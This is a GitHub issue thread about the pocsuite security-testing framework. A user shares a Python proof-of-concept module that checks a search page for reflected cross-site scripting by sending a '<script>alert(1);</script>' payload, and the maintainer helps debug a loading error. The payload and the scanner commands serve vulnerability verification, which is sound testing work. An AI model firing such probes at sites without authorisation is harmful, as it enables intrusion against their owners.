Comments (4)
nixawk
commented on May 18, 2024
@tylerdurden2010 Please paste the error details here, and I'll try to fix it.
from pocsuite.
tylerdurden2010
commented on May 18, 2024
Thanks nixawk, I guess I just copied some old fashion example code to cause these issue.
#Cross Site Scripting
# coding: utf-8
import time, urlparse,re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '2' # VUL ID
version = '1' # 默认为1
author = 'w' # PoC 作者的大名
vulDate = '2014-10-16' # 漏洞公开的时间,不知道就写今天
createDate = '2014-10-16' # 编写 PoC 的日期
updateDate = '2014-10-16' # POC更新的时间,默认和编写时间一样
references = [
'https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'] # 漏洞地址来源,0day 不用写
name = 'SearchXSS' # PoC 名称
appPowerLink = 'https://www.drupal.org/' # 漏洞厂商主页地址
appName = 'cms' # 漏洞应用名称
appVersion = '7.x' # 漏洞影响版本
vulType = 'Cross Site Scripting' # 漏洞类型,类型参考见 漏洞类型规范表
desc = '''
pure reflected xss
''' # 漏洞简要描述
samples = [] # 测试样例,就是用 PoC 测试成功的网站,选填
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, 'search.php?keywords=')
payload = "<script>alert(1);</script>"
Repayload = "\<script\>alert\(1\);\<\/script\>"
a = re.compile(Repayload)
vulurl = vulurl + payload
resp = req.get(vulurl)
reResult = re.search(a, resp.content)
if reResult:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
python pocsuite.py -r ./pocsuite/tests/SearchXSS.pyc -u chttp://192.168.33.10/cms/ --verify --report /tmp/report.html --mongodb 127.0.0.1:27017 --cookie "a=t"
,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---. {2.0.4.1-nongit-20160926}
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://pocsuite.org
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 15:46:47
[15:46:47] [DEBUG] setting the HTTP Cookie header
[15:46:47] [-] SearchXSS register failed "No module named net"
[*] shutting down at 15:46:47
from pocsuite.
nixawk
commented on May 18, 2024
@tylerdurden2010 Please review the poc format, ex: dlink_command_php_exec_noauth. I've test your module, and it works well.
ks-pocsuite [master] ->> python pocsuite.py -r /Users/Open-Security/Share/pocsuite-test/SearchXSS.py -u http://192.168.1.1/cms/ --verify --cookie "a=t"
,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---. {2.0.4.1-e36c021}
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://pocsuite.org
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 02:15:19
[02:15:19] [DEBUG] setting the HTTP Cookie header
[02:15:19] [*] checking SearchXSS
[02:15:19] [*] poc:'SearchXSS' target:'http://192.168.1.1/cms/'
[02:15:19] [-] poc-2 'SearchXSS' failed.
+-------------------------+-----------+--------+-----------+---------+----------+
| target-url | poc-name | poc-id | component | version | status |
+-------------------------+-----------+--------+-----------+---------+----------+
| http://192.168.1.1/cms/ | SearchXSS | 2 | cms | 7.x | Error: n |
+-------------------------+-----------+--------+-----------+---------+----------+
success : 0 / 1
[*] shutting down at 02:15:19
Please delete SearchXSS.pyc and try it again. If no error, the issue will be closed.
from pocsuite.
nixawk
commented on May 18, 2024
@tylerdurden2010 The issue is closed. If you have problems, please reopen it.
from pocsuite.
Related Issues (20)
- Error: 'TestPOC' object has no attribute 'result' HOT 1
- 调用cannon API 尝试集成pocsuite的时候遇到错误 HOT 5
- 集成pocsuite时报错:pocsuite.lib.core.exception.PocsuiteDataException: unable to access item 'registeredPocs' HOT 4
- 设置多线程时扫描不出来漏洞,单线程还是可以的 HOT 4
- 有的漏洞需要ftp服务器 HOT 2
- Error HOT 3
- 如何给"Extra-Params"的参数设置一个默认缺省值?
- url2ip解析可能导致ssrf HOT 1
- pcs-console verify error HOT 1
- 调用cannon API 返回结果字段不够详细 HOT 1
- 第一天打开Pocsuite.拼写错误。。Pyhton应该是Python
- url2ip返回类型不一致 HOT 3
- https://api.zoomeye.org/resources-info 接口返回数据不一致 HOT 1
- Suggestion: adding some exploit modules would be great!
- Python3.5环境,查询pocsuite的version时,异常处理语法报错 HOT 5
- 按照readme使用ZoomEye API报错
- no net module HOT 1
- 在官网上看到pocsuite3,现在是关闭了吗? HOT 4
- python2 运行attack报错
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from pocsuite.